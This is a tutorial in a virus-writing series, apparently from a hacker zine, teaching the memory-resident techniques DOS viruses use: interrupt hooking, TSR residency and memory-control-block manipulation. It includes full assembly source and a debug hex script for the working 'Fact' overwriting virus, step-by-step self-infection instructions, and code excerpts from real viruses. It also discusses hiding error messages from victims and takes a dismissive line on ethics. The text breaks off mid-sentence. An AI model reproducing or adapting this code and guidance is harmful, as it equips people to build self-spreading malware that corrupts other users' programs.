Lesson 3 The Memory Resident Virus Primer By Horny Toad This article is the third tutorial in a series of virus writing guides written by me, Horny Toad. In the first two tutorials we discussed the two most basic forms of virii, the COM overwriting and COM appending. This tutorial will now discuss and hopefully clarify virus residency techniques and aid in the general advancement of the understanding of assembly language. As with the first two tutorials, I must explain my motives for choosing the certain style of instruction that will follow. In the first two tutorials, the subject matter was more defined in the sense that when you are dealing with very basic programs, the knowledge tree is very linear in direction. In order to explain the techniques of an overwriting virus, only the most basic of concepts need be explained. Although many of the fundamentals of assembly language were presented, no depth was taken in their explanation. I felt comfortable, for example, with leaving the explanation of the stack as a temporary memory location. In this tutorial, I will delve deeper into the usage and reasoning behind certain elements, rather than simply mentioning their existence. Now with the disclaimers and scope of the tutorial. In order to write a complete tutorial on all residency concepts and techniques, I would need to put together a book; which is currently in the conceptual stage, but we'll leave it at that. There are so many techniques which are used to make a virus resident that we will only be going over the most widely used and popular ones. As you can read from the title, this is a virus residency primer. The goal is not to make you the most advanced resident virus coder out there, quite on the contrary, with this first residency tutorial, we will survey a few of the techniques of virus residency and solidify all of the concepts needed for further study. The techniques and virii that will be presented in this tutorial are in assembly language. The memory discussions will be applicable to other programming languages due to the fact that we will be looking at more system design and capabilities. More specifically with assembly, the code that I use will be compatible with Borland's TASM, because that is what I use and try to convince others to switch to. In this tutorial we will only be coding in real mode 8086 compatible. Also, although I will briefly be addressing EMS, XMS, and VMM memory manipulation, the virus techniques described will primarily be utilizing conventional memory. Due to the current status of the curriculum, we will not be covering EXE infection techniques, they will be covered in the next tutorial. Don't feel that you are getting any less of an education by limiting yourself to these concepts. The majority of the virii out there are coded using these parameters. In future installments of the Codebreakers magazines, protected mode programming on the 289, 386, 486 and Pentium processors will be discussed. Also, look for further installments on specialized memory manipulation. Right now, just learn the basics; solidify the fundamentals, then move on. What is a memory resident virus? Quite simply this is a virus which installs code in memory which infects future programs. In order to accomplish this, the virus must find a way to allocate memory for itself, in other words, it needs to find a place to hide. Furthermore, the virus needs to establish a procedure to activate the resident code to infect files. Within this tutorial, we will be looking at two widely used procedures for allocating memory for the virus code. The first, and most often overlooked, method is using the TSR (Terminate-Stay-Resident) interrupt 27h or 21h function 31h. Yes, there is a reason why this technique is very often overlooked. This is the least desired method of making your virus go memory resident. While being the easiest to invoke, it is also the easiest to notice, which, when virus programming is concerned, being noticed is not always the most desired trait. The second and more desired technique is manipulation of the MCB's or memory control blocks. We will take an in-depth look at both techniques and describe the features associated with either method. Finally, in order to activate the resident code, the virus needs to hook certain interrupts. For example, if the virus is to activate every time a program is run, the int 21h function 4bh (load/execute program) interrupt needs to be hooked. Don't worry about the terminology right now, every thing will be cleared up soon enough. -------------------- INTERRUPTS -------------------- Well, let's discuss interrupts. In order to ensure that we are all on the same sheet of music, I would like to go over the interrupt procedure. I know that there are people out there who continually use interrupts in their programs, but don't actually know what is happening behind the scenes when an interrupt is processed. Every time that an interrupt is called from a program, the program execution halts and an ISR (Interrupt Service Routine) is executed. For example, if I called an int 21h function 09h, the program would halt and the called ISR would print characters to the screen, in accordance with the parameters that were passed. Once the ISR is finished printing the characters, control is handed back to the original program. In a nutshell, this is the interrupt procedure. Now, how does all of this actually work? Let's take a look at the interrupt procedure: 1. The first thing that the computer must do when an interrupt is called is to save the current state of the host program. It does this by pushing the contents of the flags register onto the stack. In keeping with the 8086 parameters of this tutorial, the flags register is a 16-bit register in charge of indicating the current status of the computer and its processes. Each of the different flags are used for testing certain conditions relevant to program processing. Since we are only concerned with real mode programming, only 9 of the flags effect our operations. 2. Speaking of flags, the next thing that the computer does when processing an interrupt is to clear two of the flags, the interrupt and trap flags. The interrupt flag disables interrupts when set to 0, and enables them when set to 1. When the trap flag is set, the processor executes in single-step mode, one instruction at a time. Don't worry too much about understanding flag testing and manipulation; just be aware of what is happening behind the scenes. 3. The next step that the computer takes is to push the CS register onto the stack. The CS contains the starting address of the programs code segment. Remember from previous tutorials that, when the push instruction is used, the SP (Stack Pointer) decrements by 2 before transferring the word onto the stack. 4. The next operation that occurs is the pushing of the IP (Instruction pointer). When the IP is combined with the CS (CS:IP) this becomes the offset of the next instruction to be executed in the host program. 5. The processor is now ready to pass control to the ISR (Interrupt Service Routine). In order to find the location of the ISR, the IVT (Interrupt Vector Table) must be referenced. The 8086 system contains 256 different interrupts, number ranging from 0-255. The IVT contains an array of pointers to 256 addresses. The IVT is located at address 0000:0000. Each of the pointers in the IVT is 4 bytes long, or 2 words, consisting of the segment and offset of the ISR. This is important to know and will be referenced to later when we talk about direct manipulation of the IVT. This address in the IVT is loaded into CS:IP and the ISR is executed. Once the ISR has been completed, the computer needs to recover and transfer control back to the host program. The procedures taken to initialize the interrupt are essentially reversed through the execution of an IRET instruction. The IRET instruction pops the word at the top of the stack into the IP. The SP is then incremented and the new word at the top of the stack is popped into CS, followed by the same procedure for the flags register. When writing your own ISR's remember to save all registers and flags that might be changed during the execution of the ISR. On the flip side, remember to restore all of the registers from the stack once the routine is over. It's a good practice to keep a pen and paper next to you so that you can record what registers that you have pushed onto the stack. You can then have an easy reference when it comes time to popping them off the stack. You will see in a majority of virii that virus writers like to push all the registers, including all the flag registers, at the beginning of their ISR. This can be a good safety procedure just to make sure that your ISR doesn't change anything it shouldn't. For a good example of the amount of register changes that occur in your average code, trace your virus through debug and watch all of the changes that occur. I realize that this is quite a mouthful just for the description of an interrupt procedure. It is, however, important to know when writing your own ISR's and manipulating the interrupt process. Care needs to be taken to ensure that the same procedure is followed when custom ISR's are used. ------------------------------------------------- Manipulating the Interrupt Vector Table ------------------------------------------------- Now that we have discussed what an interrupt does, we now need to look at the process of changing the interrupt vector table (IVT) to look at our custom interrupt service routine (ISR). The process of changing an interrupt or capturing the interrupt function is also known as "hooking" an interrupt. There are two interrupt functions in place which allow for manipulation of the IVT. Calling these two interrupts functions with the correct parameters will allow the IVT to point to your virus code. Some virus writers prefer to directly change the IVT by figuring out the actual address of the interrupt pointer. The two interrupt functions which provide automatic IVT manipulation are: INT 21h Function 35h: Get Interrupt Vector mov ah,35h mov al,int# ;desired interrupt number int 21 and INT 21h Function 25h: Set Interrupt Vector mov ah,25h mov al,int# ;desired interrupt number lea dx,new ;new interrupt address int 21h When the first interrupt function is called, the results of the query, the ISR segment:offset are returned in ES:BX. You therefore need to save the results so that the ISR can be called from your code once your custom ISR has completed execution. There is no "one" way to tell you how to use the "get interrupt vector". Many virus writers save their results in different ways. Some people use delta offsets in their resident routines, some don't. Everyone has their own method of writing a residency routine, which gives the code its own unique feature. I have included below some examples taken directly from virus code to illustrate the different styles in handling this function. mov ax,3521h int 21h ;store the int 21 vectors mov word ptr [bp+int21],bx ;in cs:int21 mov word ptr [bp+int21+2],es ------------------------------------------ MOV AX,3516H ; Get interrupt 16H INT 21H ; DOS service (Get int) MOV I16OFF,BX ; Save interrupt 16H offset MOV I16SEG,ES ; Save interrupt 16H segment ------------------------------------------ mov ax,3521h ;set ax to get INT 21 vector address int 21h ;get INT 21 vector mov [WORD int21trap+1+0100h],bx ;store address in viral code mov [WORD int21trap+3+0100h],es ;store segment in viral code ------------------------------------------ push es pop ds mov ax,3521 ;get original int21 vector int 21 mov ds:[oi21],bx mov ds:[oi21+2],es Once you have saved the original ISR, you need to then change the IVT to point to your custom ISR. The offset of the beginning section of the virus ISR is loaded into DX and the int 21 function 25h is called. The other way of manipulating the IVT is through direct manipulation. Direct manipulation is when you access the IVT directly at its location 0000:0000. Just as with the previous method, you will see many different methods of changing the IVT directly. As long as you understand the principle of the technique, you can choose however you want to change the IVT. Just be careful that you know where the IVT is currently located. When in doubt, let DOS find it for you. Well on to the technique. xor ax,ax mov ds,ax mov ax,offset myintXXh cli xchg word ptr ds:[XXh*4],ax mov word ptr cs:[oldintXX],ax mov ax,cs xchg word ptr ds:[XXh*4+2],ax mov word ptr cs:[oldintXX+2],ax sti push cs pop ds So, what are we doing here? Initially, we need to set the DS register to point to the IVT at address 000:000. We do this by clearing the accumulator register (AX) to zero using the exclusive OR (XOR) instruction. Once AX equals zero, we then move AX into DS. This might seem a little tedious, just remember that there is no instruction for a direct move from memory to the DS register, so this procedure is necessary. The next instruction is fairly straightforward. The offset of "myintXXh" (where XXh is the interrupt which we are changing) is loaded into AX. "MyintXXh" is the location of my ISR routine. The following instruction, CLI, clears the interrupt flag (IF), which in turn, disables external interrupts. This is a safety procedure to ensure that no interrupts are processed during the manipulation of the IVT. The rest of the code is pretty self-explanatory. Essentially, what you need to do is multiply the interrupt number by 4 to get the address of the pointer to the ISR. Remember that each of the pointers in the IVT is 4 bytes long, or 2 words, consisting of a segment and offset. The above code does not take into account any further offsets that might be applicable to you code. There are many styles of writing IVT manipulation routines. You will just have to find the type that you want to use and go for it. --------------------------------- Self-Recognition --------------------------------- Hardly warranting an entire section, an important aspect of a memory resident virus is being able to determine whether or not its code is already resident. If a virus does not perform a check for previous residency installation, the consequences can be disastrous. Bottom line, check whether you are already in memory. This is typically accomplished by issuing a bogus interrupt to the interrupt that your virus handles. For example, if your virus hooks int 21h, your virus needs to perform in such a way that a check in the ISR can recognize itself. Many virus writers tend to load AX with an outrageous value and perform an int 21h. The virus ISR would then perform a check of AX when it receives the interrupt. If the virus is already resident, control is passed back to the host. If not, the next instruction in the virus would be to start the infection procedure. Whenever you talk to me about virus programming, I will always push Ralf Brown's interrupt list. Simply put, it's a fantastic tool for assembly programming. Cruise around the int 21h portion of his list and you will see many virus installation check entries. These are interrupts that have been "created" by the virus writers for self-recognition checks. Take a look at the example below. I have included a cut from Brown's list of int 21h function 33dah. This is a bogus function other than being used by the CoffeeShop Virus for self-recognition. Below this cut, you can see a portion from the beginning of the CoffeeShop Virus. The virus calls int 21 function 33da. Now look at the portion of the int 21h handler that I have included, which checks to see if the int 21h call included 33da loaded in AX. If so, the virus will simply transfer control back to the host. If not, it hooks the interrupts and continues with the infection process. --------v-2133DA------------------------ INT 21 - VIRUS - "CoffeeShop" - INSTALLATION CHECK AX = 33DAh Return: AH = A5h if resident AL = virus version SeeAlso: AX=330Fh,AX=33E0h,AX=5643h"VIRUS" Taken from the beginning of the CoffeeShop Virus ---------------------------------------------------- mov ax,33DA ;already resident? int 21 cmp ah,0A5 je not_install ---------------------------------------------------- Int 21h handler taken from CoffeeShop Virus ---------------------------------------------------- ni21: pushf cmp ax,33DA ;install-check ? jne not_ic mov ax,0A500+VERSION ;return a signature popf iret ---------------------------------------------------- --------------------------------------- Is it a COM file? --------------------------------------- In the interest of learning something new, lets take a look at another way to determine whether or not a file, that is opened, is a COM file. In the next tutorial, we will be going over EXE infection, but currently your virii need to know if the file that is being executed is a COM file. You already know how to "find first file" with the COM extension, but what do you do when the virus intercepts all files that are using the function 4bh? I have included a cut from Dark Helmet's Civil War II Virus, which demonstrates a good technique for scanning the ASCIIZ string for the COM extension. By the way, someone once asked me, what the hell an ASCIIZ string is. The ASCIIZ string is a string that is terminated by two hex zeros, a good example being the string that many virii use for determining file type, the file name string at 1eh of the disk transfer area (DTA). Take a look at the code below, then I will discuss it. check_exec: cmp ax,04b00h ; exec function? je chk_com chk_com: mov cs:[name_seg-6],ds mov cs:[name_off-6],dx cld ; check extension mov di,dx ; for COM push ds pop es mov al,'.' ; search extension repne scasb ; check for 'COM' cmp word ptr es:[di],'OC' ; check 'CO' jne continu cmp word ptr es:[di+2],'M' ; check 'M' jne continu The heart of the above code is the instruction "repne scasb". Essentially what this operation does is scan the given data until it hits the "." of the filename extension. It then does a simple read of the extension to compare if it is a COM file. Now lets talk about it more in depth. What is a better way of reading this instruction? Probably, repeat scan string until first byte match. Boy, that's a mouthful. The "repne" means to find the first match. If you see "repe", that means to find the first non-match. As far as the "scasb", AL needs to be loaded with the byte value that you want to scan for. This operation scans ES:DI in memory for the specific string. Now back up a few lines. The cld instruction (C)lears the (D)irection (F)lag. In string operations, this causes the scanning to go from left to right. If DF is left set to 1, then the scan would go from right to left. All that remains is to compare the string remaining with the COM extension. Another commonly used method to identify if the program is an EXE file is looking for the MZ string at the beginning of the EXE file header. MZ are the initials of Mark Zbikowsky, the programmer who designed the EXE file format. At offset 0 of the EXE file header compare for the letters "ZM", computer reads it backward, or for the hex equivalent 4Dh 5ah. Below, I have included an example of this operation. After the file is opened, read a chunck into a buffer and compare the word at the beginning of the buffer for the EXE signature, "ZM". mov ax,3d02h int 21h xchg ax,bx mov ah,3fh lea dx,[bp+offset buffer] mov cx,1Ah int 21h cmp word ptr [bp+buffer],'ZM' --------------------------------------- Going Resident using INT 27h --------------------------------------- No tutorial on resident virus writing is complete without addressing the DOS TSR interrupt. Many virus writers would disagree on this point, hoping that, if they don't talk about it, maybe it will just go away. When I used to live in Germany, the taboo subject was the Nazis. I kept telling my German friends to just deal with it, accept that it happened, and drive on. Int 27h was created, it's still alive, deal with it. So, what is this monster, int 27h? What does it do that is so terribly wrong? Let's take a look. * - I must mention that when I am discussing the int 27h method of going resident, I am also generally referring to its sister interrupt, int 21 function 31h. Both essentially accomplish the same end result, but are utilized slightly different. Int 27, quite simply, is the easiest and fastest way to write a resident routine. Within a COM program, when int 27h is called, the program halts execution (Terminates), but the code stays in memory (Stay Resident). The problem that arises with usage of this interrupt is that, after the program has terminated and gone resident, the program execution stops. Therefore, when an infected program is executed, the computer does become infected by the virus, but the program user is alerted to the virus due to the suspicious activity of the program halting. Granted, if the person re-executed the program, it would then run normally, as long as the virus code contained a self-recognition routine. Let's even take a closer look at int 27h. Why does the COM file cease execution once the int 27h is issued? What is it actually doing? Well, to answer the first question, the writers of the actual interrupts didn't properly consult us virus writers, hence the reason for the "Terminate" portion of the ISR. Many of the non-virus TSR's that are written are utilities designed to intervene in the background when a specific event or condition takes place. The programmers of these TSR's could care less whether or not their utility continues to execute after the int 27h is issued, mainly because the entire code is the actual utility to be loaded. When the int 27h is issued, DOS retains all memory occupied up to CS:DX, then passes control to COMMAND.COM. This is an important fact when using int 27h. Remember to move the offset into DX of the last line that you want loaded into memory, just prior to issuing the interrupt. When you are programming your virus using int 27h, the beginning of the resident portion of the code is defined in the offset of the new interrupt vector, or DX when using int 21h function 25h. I know that without an example to look at, this all probably seems very confusing. In choosing a virus to show you of this technique demonstrated, I wanted to find a very small virus. I choose to use the Fact Virus. As with most of the demonstration virus code that I put in my tutorials, the code is heavily unoptimized and basic. I choose to include it because of its small size and usage of the basic techniques of int 27h residency. The virus does work. I will guide you through the process of running the virus after we look at its structure. .model tiny .code org 100h code_begin: mov ax,3521h int 21h mov word ptr [int21_addr],bx mov word ptr [Int21_addr+02h],es mov ah,25h lea dx,int21_virus int 21h xchg ax,dx int 27h int21_virus proc near cmp ah,4bh jne int21_exit mov ax,3d01h int 21h xchg ax,bx push cs pop ds mov ah,40h mov cx,(code_end-code_begin) lea dx,code_begin int21_exit: db 0eah code_end: int21_addr dd ? virus_name db '[Fact]' endp end code_begin I would hope that you understand the majority of this virus code. I specifically choose a very small virus to prove that a TSR virus does not have to be 10+ pages in order to work. Yes, the Fact virus does need to contain a few more functions in order to make it an effective virus, but it does work. When you look at this virus, you need to actually separate the code into two pieces. The first piece is the administrative section, beginning with "code_begin". The second piece of code is the int21_virus procedure. The second portion of code is never executed during the first run of the virus. The only thing that this virus does, on initial run, is change the IVT and make the virus TSR. Try to visualize in your mind what the ISR looks like in memory. Whenever an int 21h is issued, control must go through this virus. The only thing that this virus does is stay dormant in memory until the int 21h function 4bh (load/execute program) is initiated. It then crudely overwrites the program with it's own code. Something that you should be aware of when you study virus code is the use of the object code "0eah" directly before the interrupt storage area. Remember when we programmed an appending virus and used the "db 0eh,0,0" at the beginning of the program. All we are doing is coding a specific instruction directly into the program. "0eah" or in binary 11101010 is simply the object code for a direct intersegment, or far jump. In this case, the far jump is to the address of the original ISR, int 21h. Let's infect ourselves with the fact virus. The Fact virus is a very small weak virus. Follow my simple instructions below and nothing will go wrong. There are many readers of this tutorial who, for some reason, do not receive the entire magazine. Therefore, I will include the debug script for the Fact virus below, so that you can play with it even if you did not receive the entire Codebreakers magazine. For those of you who do have the magazine, 3rd edition, you can find all of the necessary programs in the Cdbkutl folder. In order to get a functioning virus from the below code you need to find your copy of debug. Cut the below code out and save it to a file called fact.txt. Then, at a cursor, with debug in the same directory,type: debug < fact.txt N FACT.COM E 0100 B8 21 35 CD 21 89 1E 2D 01 8C 06 2F 01 B4 25 BA E 0110 17 01 CD 21 92 CD 27 80 FC 4B 75 10 B8 01 3D CD E 0120 21 93 0E 1F B4 40 B9 2D 00 BA 00 01 EA 00 00 00 E 0130 00 5B 46 61 63 74 5D RCX 0037 W Q If you need a dummy file to infect, follow the same procedure above for fly.com. Fly.com is a small COM file that does absolutely nothing. N FLY.COM E 0100 B4 4C B0 00 CD 21 RCX 0006 W Q Exit to DOS. Windows gets funny with TSR's. Once both of the files are in the same directory, type "fact". The virus will now be installed into memory. Type "dir" to see the contents of the directory. Note the file lengths of fact and fly, 55 and 6. Now type "fly". In order to execute the program, int 21 function 4bh is initiated. The virus overwrites the fly program in the new ISR. Now type "dir" again. Notice that the length of fly is now increased to 45. Pretty cool, huh? You can reboot your system now just to make sure that the virus is clear from memory. Well, that is int 27h in a nutshell. There are many different techniques that can be utilized when playing around with int 27h. Some programmers like to attach the TSR routine to the end of the virus and specify the beginning of code going into memory. Some prefer to prepend the virus to the beginning of the program so that it is easier to calculate the TSR routine parameters. By the way, as I said previously, for the most part int 27h can be interchanged with int21 function 31h. It is just easier, when using programs under 64k, to use int 27h. If you would like to use int 21h function 31h, follow the code below: mov ah, 31h mov dx,size (in paragraphs) int 21h Example of function 31h: By the way, the code below is not a virus, rather a simple demonstration of a resident program. Wart.com hooks the keyboard interrupt (int 09h). When the program is resident, every time you push the `h' or `t' (or `H' or `T'), you will hear a beep. Don't worry about the instructions that you don't understand, just look at the structure of the routine that makes the code go resident. code segment assume cs:code, ds:code org 100h vlength equ (resi_leap-start+15)/16 start: jmp resi_leap old_int9 dd ? my_int9: push ax push cx push ds in al,60h cmp al,35 je wart_growth cmp al,104 je wart_growth cmp al,20 je wart_growth cmp al,116 je wart_growth jmp bye_bye wart_growth: mov al,192 out 43h,al mov ax,1000 out 42h,al mov al,ah out 42h,al in al,61h mov ah,al or al,03 out 61h,al mov cx,19000 pause: loop pause mov al,ah out 61h,al bye_bye: pop ds pop cx pop ax jmp cs:old_int9 ;-----------Below this is the code responsible for going resident ;-----------and hooking int 09h. Everything above this is what ;-----------stays resident, my new ISR for int 09h resi_leap: cli mov ax,3509h int 21h mov word ptr old_int9,bx mov word ptr old_int9+2,es mov ax,2509h mov dx,offset my_int9 int 21h mov ah,31h mov dx,vlength sti int 21h code ends end start N WART.COM E 0100 EB 43 90 00 00 00 00 50 51 1E E4 60 3C 23 74 0F E 0110 3C 68 74 0B 3C 14 74 07 3C 74 74 03 EB 1F 90 B0 E 0120 C0 E6 43 B8 E8 03 E6 42 8A C4 E6 42 E4 61 8A E0 E 0130 0C 03 E6 61 B9 38 4A E2 FE 8A C4 E6 61 1F 59 58 E 0140 2E FF 2E 03 01 FA B8 09 35 CD 21 89 1E 03 01 8C E 0150 06 05 01 B8 09 25 BA 07 01 CD 21 B4 31 BA 45 01 E 0160 FB CD 21 48 6F 72 6E 79 20 54 6F 61 64 21 0A 0D RCX 0070 W Q ------------------------------- Memory Control Blocks ------------------------------- In order to have any understanding of what a memory control block (MCB) is, we must first have a discussion about memory. As you remember in the beginning of this tutorial, we are only going to be discussing real mode 8086 programming. This, in a sense, limits the scope of memory that we can utilize. What part of memory can we use? In real mode programming, we are restricted to memory below 1 MB. The area below 1 MB can be further divided into 2 sections, conventional and upper memory. Above 1 MB lies the extended and high memory, which will be addressed in future tutorials. This is what it looks like. Conventional Memory - 0 to 640k Upper Memory - 640k to 1 MB Extended memory - Addressed above High Memory - 1 MB Typically, most virus writers will confine their memory utilization to conventional memory. When you hear people say that they are loading their virus high, it usually means that they are loading their virus into the higher portion of conventional memory. Conventional memory is divided up into blocks of memory. Each block of memory is "described" by a memory control block, or MCB. Depending on who you talk to, the MCB will also be referred to as the memory arena or arena header, but the virus writing convention is to use the term MCB. At the beginning of each block of memory, DOS creates a one-paragraph (16-byte) header, which describes certain attributes of the block. Keep in mind that the memory blocks themselves are divided into 16 byte memory paragraphs. As the blocks of memory are allocated by DOS for program use, the MCB's describe how the actual block of memory is being used. An MCB is located immediately before the block of memory it describes. All of the MCB's together are referred to as the MCB chain. Each of the MCB's in the chain have a certain status, M or Z. M status denotes that the MCB is located within the chain, while Z is the status of the last MCB in the chain. This all might sound a bit confusing, but it isn't. ------------------ - MCB - ------------------ - Block of - - Memory - ----------------- - MCB - ----------------- - Block of - - Memory - ----------------- - MCB - ------------------ and so on.. Lets take a look at the information that can be found within an MCB. MCB Structure Offset Size Description -------------------------------------------------------- 0 1 MCB status (M or Z) 1 2 PSP segment of owner 3 2 Memory block size (in paragraphs) 5 3 Not used 8 8 Program filename To better visualize what the MCB's are, I wrote a small program which traces up the MCB chain, extracting certain data and displaying it to the screen. Under the directory Cdbkutl in the 3rd edition of the Codebreakers Zine, you will find the program "CB-MCB.EXE". Run this program to see a demonstration of the MCB chain on your computer. This program contains NO virus code, just a simple demo of what useful data that can be found in an MCB. You will notice that the PSP segment is located at offset 1. I really don't want to explain what the PSP is again; I have already touched upon it in previous tutorials. Just to refresh your memory, when the program loader is loading a program into a segment for execution, it creates a 256-byte program segment prefix. Along with the MCB, many useful bits of information can be derived from the PSP. Ralf Brown, with whom you all should be familiar with, has created a beautiful diagram of the PSP. I have included it at the end of this tutorial, take a look. Now that you have a taste of what the MCB's are, let's discuss techniques used in MCB manipulation in order to allocate memory for your virus code. Remember when I discussed the definitions of a resident virus? We have already discussed how to hook interrupts for activating your virus code. The other factor in resident programming is making your virus go resident. We have already looked at the int 27h method of residency, now we will look at allocating memory through DOS functions and manipulating MCB's. Please tell me to stop making these awful pictures. Below is a simple diagram of what we want to accomplish with the MCB method of virus infection. Take a look at the memory diagram before infection. The host program has been allocated all available memory. What are virus will attempt to do is shrink the amount of memory that the host program has, then allocate enough memory for itself and move into that memory space. Before After Infection Infection ------------------ ----------------- - MCB - - MCB - ------------------ ----------------- - Block of - - Block of - - Memory - - Memory - ----------------- ----------------- - MCB - - MCB - ----------------- ----------------- - Program - - Program - - - - - - - - - - - - - - - ----------------- - - - MCB - - - ----------------- - - - Virus - ------------------ ----------------- Top of Memory Top of Memory The important interrupts for use in memory allocation are int 21 functions 4ah (Set Memory Block Size) and 48h (Allocate Memory Block). The first thing that your virus needs to do is to request the maximum amount of memory available. This is done with the int 21h function 4ah. The strategy is to request an inordinate amount of memory so that the function will fail, but send us back the actual amount of memory available. The code for this is: mov ah,4ah mov bx,0ffffh int 21h If you ask for 0ffffh, you are requesting 65535 paragraphs of memory, which is an insane amount. The result will be the actual maximum available memory returned in BX. Just to make you aware that there are different techniques out there that virus writers use, another way of getting the same information loaded into BX is to access the MCB directly and simply read it. When a program is loaded into memory, it is assigned all available memory. This value appears in the MCB at offset 3. We can therefore access the MCB directly by decrementing a segment register to the address of the MCB and accessing the information directly. Code for this operation: mov ax,ds dec ax mov ds,ax ;We now have the MCB off of DS. mov bx,word ptr ds:[03] The MCB size, or total available memory is now in BX. Armed with this information, we can then subtract the size of our virus plus 1, to account for the MCB, from the maximum available memory and execute the function again. This changes the amount of available memory for the program. For example: mov ax,4ah sub bx,(endOfVirus-beginOfVirus+15)/16+1 int 21h When calculating the amount of memory to allocate, keep in mind that you are working in paragraphs. Therefore the virus size needs to be divided by 16. The virus size is calculated by subtracting the offset for the end of the virus from the beginning and adding 15. The addition of 15 acts as a way of rounding up. Care must be taken that enough memory is allocated so that the transfer of the virus into memory doesn't overflow the amount requested. If you would happen to move one extra byte into memory that is not accounted for, you run the risk of overwriting the "M" in the next MCB and crashing the system. The code for allocating memory for the virus: mov ax,48h mov bx,(endOfVirus-beginOfVirus+15)/16 int 21h Now that memory has been allocated for the virus, the MCB needs to be changed and the virus moved into memory. Upon successful operation of function 48h, the segment address of the allocated memory block is returned in AX. Remember that the MCB is located directly before its memory block. To access the MCB we need to decrement the segment address in AX and move the address into the extra segment register, or ES. Lets look at the code: dec ax mov es,ax Now that the MCB can be accessed off of ES, take a look at the MCB structure and lets see what we need to change. Firstly, we need to change the status of the MCB to "Z", of the end of the chain. Whether you want to use "Z" or its hex equivalent (5ah) is up to you. The next common practice is to change the PSP segment of the owner at offset 1 to show that the block is owned by DOS. This is accomplished by moving an 8 into the location. If you see a zero in this location, it means that the block is free. You could actually set the segment address to point to the virus code, but typically, as a survival tool, the owner is set to DOS, 8. The code for this is: mov byte ptr es:[0],'Z' mov word ptr es:[8],8 The only thing that is left to do is to copy the virus into memory. This is very easy. All that you need to do is to increment AX and move the memory block address back into ES. Load the data segment register (DS) with the code segment register (CS). Clear the destination index register with an XOR. Set the length of the virus in CX and perform a "repeat moves bytes" instruction. Enough narrative. what does the code look like? For example: inc ax mov es,ax push cs pop ds xor di,di lea si,startOfVirus mov cx,endOfVirus-startOfVirus rep movsb This can be done a multitude of ways. This is just an example. Keep in mind that no delta offsets are used in this sample code. You have to adapt it to your own style. Another way that you might see the MCB technique utilized is with complete direct manipulation. There are many ways to implement this technique of manipulating MCB's. One of the direct techniques that you can use involves manipulating data in the PSP, MCB, and BIOS. Take a look at the code below. sub word ptr cs:[2],40h ;----------------------------- mov ax,cs dec ax mov ds,ax sub word ptr ds:[3],40h ;----------------------------- mov ax,40h mov ds,ax sub word ptr ds:[13h],1 mov ax,word ptr ds:[13h] shl ax,6 mov es,ax push cs pop ds xor di,di lea si,start mov cx,end-start rep movsb This is actually a very neat and compact residency module. Try to digest it in sections. The first section manipulates the top of memory section of the PSP. When a program is loaded for execution, remember that the PSP is located directly before the program from 00 to 100h (CS). The initial subtracting of 40h (1KB) from the PSP, lowers the top of memory data in the PSP. I hope that you recognize the next section of code. This is the section that accesses the MCB and subtracts 40h (1KB) from the size of the MCB. Take a quick glance at offset 3 on my lovely MCB chart. The last item that needs to be changed is the BIOS. Within the BIOS data area at 413h and 414h, is the amount of base memory that can be accessed. This needs to be shrunk by 40h as well to reserve that much space for your code and to ensure that it is not overwritten. In the above code, location 413h is accessed by using segment 40[0]h and offset 13h. You will see either addressed utilized, it is simply a matter of preference. The value that is subtracted from the 413h location of the BIOS data area is the amount of K bytes that you need, in this case, 1 KB. Now that the BIOS has been adjusted, we then need to find the address of the free segment to use. This is done by multiplying the adjusted BIOS base memory amount by 64. The SHL, or (S)hift (L)ogical (L)eft, instruction may be used for this operation. On processors above the 8088/8086, the SHL instruction can be used with a constant up to 31. In the above code, the constant is 6. If you are working with an 8088/8086, you will need to load CL with the constant and issue an SHL ax,cl. After the multiplication is completed, the value is moved into ES, for addressing in the string movement, which should be familiar to you. As with the Fact virus, I am also including a virus which demonstrates the MCB manipulation technique. The virus that I am including is Dark Helmet's Civil War II V1.1. Take a look at the code, which can be found in the appendix. There is no destructive routines in his virus. Don't believe some of that shit that you seen in AV program descriptions of his virus. If you don't trust me, just look at the code, it's harmless. Probably the only thing that you won't recognize in his code is the int 24h handler. I haven't gone over this, but int 24h is the critical error handler. When you hook this interrupt, you are intercepting critical error messages before they can appear on the screen. This is a technique that we use to avoid alerting the lamer that an error has occurred in the infection process. Both the Fact virus and the Civil War II virii can be compiled with TASM. If you are not reading this tutorial from the 3rd edition of the Codebreakers Zine, cut the code from this tutorial and save it in a file named CivilWar(or Fact).asm. Otherwise this ASM file can be found in the Cdbkutl folder. Issue the commands: A:\tasm civilwar(or Fact).asm and A:\tlink /t civilwar(or Fact).obj *TASM Hint - If you have errors in your code and would like to save them for future reference, issue the command line argument: A:\tasm NameofVirus.asm>NameofVirus.txt The errors that occur during compiling will be saved in a TXT file. I find this helpful when I am debugging my code. As you can see, I prefer to execute the virus on the A: drive (floppy). You should also exit Windows and perform all this in DOS. Follow the same instructions as with the Fact virus. Include in the same directory a "Fly" test COM file. Check the size of the Fly program before and after execution of the program and before and after the virus is resident. It is always advisable to check the code of the virus before compiling, just to make sure that there is no destructive routines in the code. Although, there are many ways for a virus to destroy your files and hard drive, the most common method is to us int 13h to write shit all over the drive. If you see int 13h functions 03h, 05h, 09h, . get out! Ethics Hmmm. Now that you are entering the world of advanced virus techniques, you might be faced with that decision of whether or not to write destructive routines in your code. I am not going to talk about this too much because I might get into trouble. Officially, I will say that the Codebreakers do not condone destructive code. We are more interested in system manipulation and programming techniques. However, many AV personages view all virus code as destructive by nature of what it is. So you might think that your virus is non-destructive, but, in their eyes, it's still malicious code. Also, if you have something to prove and are pissed off at the world, who is going to be scared of a gun that doesn't shoot or a crook who doesn't steal? Enough said. ---------------------- Conclusion ---------------------- The purpose of this primer is to aid the advanced beginner in understanding the basics of virus residency techniques. My secondary aim is to add to the general programming knowledge of the assembly aspirant. In future tutorials, I will be covering more advanced residency techniques such as manipulation of memory above 1 MB, and with that, programming in protected mode. What do they have out now, the 686? And we are still teaching 8086? Don't worry. The 8086 instruction set offers still many features that we haven't covered and will still be used into the future for virus programming. One piece of advice that I want to give the programmer is that you need to know the basics before you can go on to the advanced topics. As you can see in this tutorial, the actual virus infection techniques were not covered. You should already know them from the first two tutorials. I don't want to have to repeat the basics too many times. Also, keep in mind that this tutorial is divided into separate modules. In order to write a memory resident virus, it is imperative that you divide your code into separate modules corresponding with the individual tasks that you want the virus to perform. For example, if you look at the Fact virus, and you want to add self-recognition capabilities to the virus, you will need to include a self- recognition module. The hooking of the interrupts and the resident enabling processes are all modules within the virus. Take a look at the virus creation engines. If you want to add an extra capability to a virus, the creation lab tacks on another module for that routine. Most of your virii, will use the same techniques. If you find a routine that works for you, keep it. As I have said previously in the tutorial, I only wanted to introduce you to the basics of writing resident code. In the next tutorial, I will be introducing EXE file type infecting, along with more residency techniques that were not covered in this tutorial. My advice to you 